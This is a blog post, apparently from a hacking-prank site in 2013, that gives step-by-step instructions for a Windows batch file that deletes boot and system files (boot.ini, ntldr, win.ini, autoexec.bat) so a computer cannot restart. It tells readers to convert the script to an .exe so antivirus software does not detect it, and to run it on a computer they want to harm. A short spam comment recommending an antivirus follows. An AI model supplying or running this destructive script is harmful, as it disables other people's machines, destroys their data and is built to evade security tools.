.

Monday 9 December 2013

How To Crash A Computer 4 Forever



This is a yet another Windows prank where you are going to learn How to Shutdown a Computer Forever, by making a simple Batch File, this batch file will starts deleting very useful system files then it will shuts down the computer with Shutdown Command. Remember not to use this on your Computer, else you'll not be able to recover it unless you re-install Windows or get rid of your PC.


1) Go to: Start > Run... (Or press Windows+R )

2) Type notepad and Click OK

3) Copy the following text and paste it to Notepad: 

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

4) Save the file as :  Shutdown.bat

5) Convert the .Bat file to .Exe using Bat2Exe Converter
You may skip this step, but Anti-viruses will detect it as Malware. 

6) Run the converted Exe file (or Bat file) in the Computer you want to harm.

7) Done! The computer will loses very important system files and won't restart again.



1 comments:

Blogger said...

Have used Kaspersky protection for a few years, and I'd recommend this Anti-virus to everybody.

Post a Comment

Related Posts Plugin for WordPress, Blogger...
 
-->

Copyright © 2010 Hackway2u